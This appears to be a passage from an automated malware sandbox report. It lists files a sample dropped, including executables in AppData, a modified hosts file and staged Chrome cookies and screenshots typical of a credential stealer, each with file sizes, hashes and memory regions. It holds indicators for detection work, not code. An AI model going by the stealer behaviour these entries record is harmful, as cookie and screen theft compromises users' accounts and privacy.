                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.4MB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              916f7dea6831485387d70b0891455e65

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              176e995cc2584d7c9703b2beee0994dcc4be91d5

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              c47e49026afb1d2c8708f1e36510ad862eb288c7ac48e9c4bebfbd051475fbc2

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              ba5c40e6416a53c88f5b5d7e0ce346956ef6bd0aebed355df8070ebb71dda78125945fe1cdca87caa29a2b5d98c437bafd228396a516c91f764256e54556f0e4

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\oHEROADgUWCyRrS\Display\Display.png

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              438KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              fb6f58530fa9ede1acbef03d0b63dc9a

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              38922310d59a00b1e5dfbcb06c67eab0d809e33e

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              329755320adec1e9ee2e32b7c4c6e5f75d03b58d8af05548504a7140eedbd685

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              014db09674922070677ae0c39545ca22fdccb71455e5156c4b267d63f785ac35615f4f0fdb89ded1a40989fbeba490e669dc198a0e0da6f4f56402dd78a71e7d

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uAO9XtloSQH7EiW\Browsers\Cookies\Chrome Cookies.txt

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              259B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              a0257361e361e03a4223bd54c54f6090

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              3632cc6153ef063f17fce0e5f2072b5fde03f1bd

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              d112ea90bb3c728730299389f84acf20c822e9ffe06394eea533a885d89ff5e2

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              e186a5d7767147105940636dde2ed0095a5313a2d1374e5a43c2bc79c9aab5463fe075ad457aebc393d031248159a14c9e08621a6d433b18cdbdf27a046ed688

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uAO9XtloSQH7EiW\Display\Display.png

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              436KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              b0cda6dd61153a319810a6d4af885e55

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              939927a4111f67d2874a3bcd62484717ad2a5afb

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              fd0b61d76a83db992b754eb938e99fdafead0d2b8a19fc658fc42d487ed806a0

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              3f9ed826ebc8d7369cae12caead677043eba92029b305569ed105586e065567435e7cb007c4841eff376ae9ca33c8a30384b3a85abe9b72b87abcca31fa21ef9

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Server.exe

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              23KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              32fe01ccb93b0233503d0aaaa451f7b2

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              58e5a63142150e8fb175dbb4dedea2ce405d7db0

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\conhost.exe

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              37KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              b37dd1a1f0507baf993471ae1b7a314c

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              9aff9d71492ffff8d51f8e8d67f5770755899882

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              4028457913f9d08b06137643fe3e01bc

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

                                                                                                                                                                                                                                                                                                                            • memory/516-31-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              10.8MB

                                                                                                                                                                                                                                                                                                                            • memory/516-21-0x0000000000930000-0x0000000000E90000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.4MB

                                                                                                                                                                                                                                                                                                                            • memory/516-51-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              10.8MB

                                                                                                                                                                                                                                                                                                                            • memory/516-20-0x00007FFBB9E73000-0x00007FFBB9E75000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                            • memory/1344-47-0x0000000000FB0000-0x0000000000FC8000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              96KB

                                                                                                                                                                                                                                                                                                                            • memory/2124-71-0x0000000000DE0000-0x0000000000DF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                                                                            • memory/3012-270-0x00000240E58C0000-0x00000240E5ADC000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                                            • memory/4028-249-0x00000244F7310000-0x00000244F752C000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                                                                                                                            • memory/4040-72-0x0000015DFA1F0000-0x0000015DFA212000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              136KB

                                                                                                                                                                                                                                                                                                                            • memory/4940-46-0x000001511FF90000-0x000001511FFD0000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              256KB

                                                                                                                                                                                                                                                                                                                            • memory/4940-152-0x000001513A860000-0x000001513A86A000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                            • memory/4940-100-0x000001513A650000-0x000001513A66E000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                                                            • memory/4940-99-0x000001513A680000-0x000001513A6D0000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              320KB

                                                                                                                                                                                                                                                                                                                            • memory/4940-98-0x000001513A6D0000-0x000001513A746000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              472KB

                                                                                                                                                                                                                                                                                                                            • memory/4940-153-0x000001513A8A0000-0x000001513A8B2000-memory.dmp

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              72KB